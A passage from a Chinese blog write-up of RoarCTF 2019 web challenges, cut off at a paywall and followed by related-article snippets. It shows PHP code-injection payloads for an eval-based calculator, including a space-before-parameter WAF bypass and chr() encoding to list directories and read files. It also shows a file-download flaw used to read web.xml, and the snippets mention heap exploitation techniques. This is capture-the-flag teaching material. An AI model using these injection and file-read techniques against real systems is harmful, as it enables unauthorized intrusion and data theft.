RoarCTF2019部分Writeup

最新推荐文章于 2022-04-10 13:09:35 发布
最新推荐文章于 2022-04-10 13:09:35 发布
阅读量867 收藏
点赞数
分类专栏: 赛题复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/103312318
版权
本文详细介绍了RoarCTF2019比赛中Web部分的挑战,包括Easy Calc的PHP命令注入,Easy Java的文件包含漏洞,Simple Upload的ThinkPHP框架利用,以及Online Proxy的SSRF与数据库注入。同时,Misc部分讨论了黄金6年的视频解码和forensic的内存文件分析,揭示了如何通过各种技术获取flag。
摘要由CSDN通过智能技术生成

Web

Easy Calc

页面源码线索中得到calc.php

 <?php
error_reporting(0);
if(!isset($_GET['num'])){
   
    show_source(__FILE__);
}else{
   
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
   
                if (preg_match('/' . $blackitem . '/m', $str)) {
   
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
} ?>

需要上传一个num的参数值,然后经过正则过滤之后输出我们上传的num的值的执行结果。

我们可以使用分号;来使num为多个语句,从而执行多条语句,关键是我们怎么传递这个num的值,而且在页面源码中告诉我们网站上了WAF

我们并不能从网页中得到flag在哪里,就算利用成功可以读取文件,也要先知道flag在哪,所以要先利用scandir("/")来读取一下文件

由于正则中过滤了引号,所以我们利用的时候要进行一下字符转换:num=1;var_dump(scandir(chr(47)))
但是这样并不能成功,那就可能是waf的问题了,waf毫无疑问也是用php写的了。
这个绕过只需要在传参的时候在num参数签名添加空格即可,也就是参数“num”变成了“ num”,因为php解析的时候会去除参数前面的空格,但是waf对url分析的时候可能不会去掉空格

calc.php? num=1;var_dump(scandir(chr(47)))
读取到存在f1agg文件

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
读取出flag内容
Easy Java

进去页面是个登录界面,help可以进入文档下载界面,但是显示:java.io.FileNotFoundException:{help.docx}

修改成POST请求尝试,发现可以下载到help.docx文件,虽然这个文件没啥用,但是给了一个文件包含的漏洞

但是此时悲催的是仍然不知道flag在哪个文件里,那就尝试读取一下 /WEB-INF/web.xml文件,这个是Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
(从题目提示java网站以及网站错误得到的Tomcat中间件得到/WEB-INF为安全配置目录)

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    <welcome-file-list>
        <welcome-file>Index</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>IndexController</servlet-name>
        <servlet-class>com.wm.ctf.IndexController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>IndexController</servlet-name>
        <url-pattern>/Index</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>LoginController</servlet-name>
        <servlet-class>com.wm.ctf.LoginController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>LoginController</servlet-name>
最低0.47元/天 解锁文章
大千SS
关注
专栏目录
[RoarCTF 2019]Easy Java
ChenZIDu的博客
12-13 5323
WEB-INF主要通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码 首先看到一个页面,点击下help看看啥情况。 发现输出一串 java.io.FileNotFoundException:{help.docx} 可能是报错信息,打开Brup截取请求信息 GET /Download?filename=help.docx HTT...
Roarctf 题解
qq_41071646的博客
10-17 822
这次Roarctf 很可惜 ,,, 不过这次也算做出来了一些题目 决心把不会的题目好好看看 会的写到这篇博客 不会的保存下来 以后留下来好好看看,, 估计需要几天更新 这几天都有些忙 = = RE: polyre 这个题目ollvm 如果不用脚本 就直接走远了,800多行代码 ,, 顶不住,。。 用 deflat 搞一下 去除后的效果 __int64 _...
ROARCTF部分WP
Sakura给爷pwn全场
12-08 333
链接:https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&mid=2247485804&idx=1&sn=15b8b99fc9cdca98d5fa99484b776063&chksm=fd711c21ca0695374a191994b75b563b1a7604b70aa3c0b0251e78721f5a24de8ff85f85284f&mpshare=1&scene=23&srcid=1207vysHlx
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2344
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
RoarCTF_Web_Writeup
Lethe's Blog
10-24 1103
周末有点事,BUUCTF上复现一下… easy_calc 这一题的界面和国赛的lova_math一题一样,应该是从那题改的。 源码中提示了这题加了waf,我们访问calc.php,看到源码如下 num传入表达式,然后用eval()计算并输出,因为加了waf所以num中如果有字母,会直接返回403,所以第一步就是绕过它。 这里可以利用HTTP请求走私来绕过,关于该漏洞可参考这篇文章:协议层的攻击...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
Roar CTF 2019 坦克大战 Writeup
Secz的博客
10-15 2118
下载压缩包 解压看到 可知该游戏由Unity3D编写,由于没有相关逆向经验,上网查阅得知游戏代码部分都在Assembly-CSharp.dll文件中,通过dnspy可以打开此类型的dll. 直接查看跟题目相关的函数,在MapManager下有名为WinGame的函数.源码如下 // MapManager // Token: 0x06000029 RID: 41 RVA: 0x00003050 ...
BSidesSF 2019 部分writeup
Kr的博客
03-06 2445
forensics: table-tennis 给了一个流量包,使用wireshark打开,通过查找字符串和跟踪TCP数据流并没有发现什么,以我的水平,基本上到这里就结束了。 后面查看了其他人写的writeup,跟着复现了一下。 这个流量包中除了大量的加密的TLS和TCP数据流,还有一些ICMP数据包,发现里面有HTML数据。 这里要将这些HTML数据提取出来,照着大佬使用pyt...
第二届安洵杯2019部分writeup
Sea_Sand息禅
12-01 6107
Misc 吹着⻉斯扫⼆维码 这个就有点过分了,36张碎片,手动拼二维码 先是爆破出了压缩包的密码,解出来flag.txt里面有点乱码,显然还需要操作,可能就跟二维码有关了,二维码扫出来的结果是: BASE Family Bucket ??? 85->64->85->13->16->32 下面就需要把flag.txt中的内容进行base的这一系列的解码了,但是这个1...
RoarCTF2019 easy Java
zydbk123456的博客
04-26 513
1.尝试登录 打开实例,首先出现了一个登录页面。考虑账号用admin,密码先尝试几个登录。提示wrong password,但是,这个页面的密码可以直接用暴力破解的方法得到。得出来用户名是admin,密码是admin888。 登录过去发现页面"flag is not here",页面没有啥有用的信息,回到登录页面,发现有个help链接。进去,发先报错 “java.io.FileNotFoundE...
ROARCTF2020-Crypto
Gm1y's Blog
12-10 1026
前言 这次ROARCTF我打得时间比较短,所以只做了Crypto_System,其余两题都是后来复现的… Crypto_System 将式子都化简为以g为底的式子,这样可以将这题看起来的离散对数问题化简为简单的求逆元问题。由于可能求不出逆元,所以需要进行判断 (用Linux跑的) from pwn import * from libnum import * from Crypto.Util.number import * from hashlib import * from gmpy2 import inv
web-[RoarCTF 2019]Easy Java
wojiushilsy的博客
06-09 284
题目要点题目内容解题 题目要点 WEB-INF/web.xml泄露 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库.
web-[RoarCTF 2019]Easy Calc
wojiushilsy的博客
04-15 307
题目要点ji题目内容解题解法一:解法二: 题目要点 ji PHP的字符串解析特性 HTTP走私攻击(HTTP数据接收不同步攻击) scandir():列出 参数目录 中的文件和目录 var_dump() 函数用于输出变量的相关信息。 var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。 file_get_contents()...
roarctf_2019_easyheap
z1r0的博客
04-10 457
roarctf_2019_easyheap 查看保护 有一个大uaf,show的条件是bss上的一个数据应该 为0xdead… 在666中可以进行删除和创建,这里有一个bug,602010这个数据变成0之后–就是成负数可以无限次使用了 攻击思路:因为有uaf和666这个功能,所以我们构造fastbin attack 形成double free,其实fastbin attack使用的是fastbin_dup_consolidate这个手法。构造出double free之后将堆申请到name_addr这里
RoarCTF2020 pwn qtar & 2a1 writeup
HiTaQini
12-07 549
机缘巧合出了两道pwn,希望各位师傅们玩儿的开心 :-p 题解详见 Roarctf 2020 pwn writeup
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3046
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值